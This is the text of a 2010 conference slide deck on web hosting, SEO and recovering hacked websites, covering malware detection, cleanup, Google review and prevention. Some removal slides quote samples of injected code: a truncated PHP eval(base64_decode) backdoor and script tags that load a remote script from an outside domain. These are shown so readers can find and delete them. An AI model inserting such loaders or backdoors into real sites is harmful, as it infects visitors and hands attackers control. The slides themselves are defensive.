2010 11 pubcon_hendison-hosting


Published on

Scott Hendisons Pubcon 2010 presentation on web hosting and SEO

Published in: Technology, Design
  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

2010 11 pubcon_hendison-hosting

  1. 1. Hosting & SEO Scott Hendison Search Commander, Inc. SEO Automatic
  2. 2. About Scott Hendison • Began “hosting“ websites in 1997 with one server in our retail computer store, with standard DSL • Grew to 11 servers then switched to a sort of “datacenter co-op“ a few years ago, all in the same local facility in Gresham Oregon. • Not our primary business, but we still host over 1000 domains today, as well as maintain end-user hosting accounts on several major hosts.
  3. 3. Web Hosting and SEO • I've been on this panel three times and discussed – – shared vs. dedicated servers – Static vs. shared IP addresses – Apache 1 vs Apache 2 – Apache vs. Windows – .htaccess – mod_rewrite – Windows IIS rewriting options – Server speed and performance – and other riveting subjects trying to better relate to SEO
  4. 4. Web Hosting and SEO Speed and Performance • I “predicted” at Pubcon 2009 that speed will soon matter for organic, then Matt Cutts announced next day • Not a risky prediction, considering Adwords Quality Scores • Speed as ranking factor began “counting” April 9, 2010 • Google has two great tools – Page Speed for Firefox – (download inside Webmaster Tools) – Google Chrome (right click in Chrome and “inspect element”)
  5. 5. But I‘m Not Talking About Speed • Far more important • The #1 killer of websites • The thing that drives visitors away in droves • Drains PPC money as fast as possible • Google stops people from even arriving at your site! • I’m talking about…
  6. 6. Malware
  7. 7. Malware • Nothing can fully protect users from getting viruses • Viruses can steal the BEST passwords & logins • If you don’t get one, contractors, employees or family probably will, infecting your network. • People should use index cards and a fireproof safe • But that’s pretty unrealistic, so learn to deal with disasters
  8. 8. Malware identification • Nearly 15% of “our” sites were hacked in 2010 • Most were self inflicted through laziness and stupidity • The hacks really didn’t vary all that much • Getting rid of hacks can be a headache • Getting back into Google isn’t very difficult • Protecting yourself FROM hacks is getting easier, but… • Sadly, the hacking keeps getting easier…
  9. 9. Malware • Identification • Removal • Prevention
  10. 10. Identification • You can get notified by a client or customer • You discover it in a browser or AV warning • You can see your site flagged in the SERPS • You can get notified by Google WMT – (sometimes)
  11. 11. Malware Warnings
  12. 12. Warnings in the SERPS!
  13. 13. Interstitial Page
  14. 14. #1 Conversion Killer • Nothing hurts you more than if people wont come to your site in the first place. • Once you‘ve identified a problem, what can you do? – Clean up the offending code – Beg Google for a clean bill of health
  15. 15. Removal • Most hacks we saw were pretty similar • Cross Site Scripting (XSS) and SQL Injection • Adding links and adding hosted scripts • Hackers want to add links to your site • Hackers want to add scripts to infect users with viruses which in turn, steal more passwords • Not too technical - Look for strange javascripts!
  16. 16. Removal
  17. 17. Removal
  18. 18. Removal • If WMT is no help, then look at files manually • Use backups and file comparison tools • Check recent change dates • Look for things that don‘t belong, often in pages named index, home, and default - in .php and .html extensions • Look in headers and footers too
  19. 19. Removal <?php eval(base64_decode('aWYoIWlzc2V0KCRtNzc5djEp KXtmdW5jdGlvbiBtNzc5digkcyl7aWYocHJlZ19tY <snip> XRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjJ203 Nzl2MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlK CRfUE9TVFsnZSddKSk7')); ?> (<snipped> goes on for dozens of lines )
  20. 20. Removal • Usually index, home, header and footer – <script src=http://domainX.ac.jp/course/VIVID.php ></script> • And in most or all javascript files - document.write('<script src=http://domainX.ac.jp/course/VIVID.php ></script>');"
  21. 21. Removal • Not all that complicated, just tedious. • Search files for <script src=http:// and make sure you recognize them all, and search for eval(base64 too. • Overly simplistic to say “clean it up“ but others have likely had your same problem. • Google for it w/ quotes to find YOUR exact code. • Get a quick look at your site w/ free tool at http://UnmaskParasites.com
  22. 22. Once You‘re Clean
  23. 23. Once You‘re Clean Write something like this – Thank you for identifying our malware problem, and we believe all is now cleaned up. We have verified that we're clean using an online scanner - http://www.unmaskparasites.com - and would appreciate a speedy resolution. Thank you, Scott Hendison
  24. 24. Once You‘re Clean • Document your process and improve it • Get ready to have it happen again • Begin to protect yourself – Get paranoid.
  25. 25. Prevention • FTP Passwords – Don't share FTP access – make new users instead. – NEVER use a dictionary word in the password – Use at least 8 characters (some people will say 20+) – Mix Upper Case, Lower Case, numerals and symbols – CHANGE passwords without telling your dev people every few months. • Stop using plain old FTP - WinSCP is free SFTP
  26. 26. Prevention • Using a CMS? • Find the documentation on locking it down • Do ALL system updates • Do ALL released security patches • Routine maintenance (just like WMT & Analytics) • More popular = more vulnerable, like WordPress
  27. 27. Prevention • Nearly 8% of all sites are now WordPress* • We work in Wordpress 95% of the time • Same thing that makes it great makes it riskier • Amazing plugins have been developed for safety • Common threats have easy solutions * Supposedly said my Matt Mullenweg at one of the 2010 WordCamp, but I can‘t prove it.
  28. 28. Prevention
  29. 29. Prevention
  30. 30. Prevention
  31. 31. Prevention
  32. 32. Prevention • Total prevention may be impossible. Be prepared! • Backup restoration sometimes faster than repair • Hosts can may keep backups 7 days, or even less! • Get weekly (or daily) backups in place & off-host • Store a year of monthly backups at AWS • Document the entire restore process and TEST • Your site hack is generally not the webhosts fault!
  33. 33. Take-aways • FAR more important than your SEO • Dig into Webmaster Tools malware area • Change all FTP Passwords asap, & consider SFTP • Check for updated versions on forms, and on your CMS • Get backup and restore processes in place NOW
  34. 34. Thank You WordPress Lunch Table Thursday 1:30 Scott Hendison Search Commander, Inc. shendison@seoautomatic.com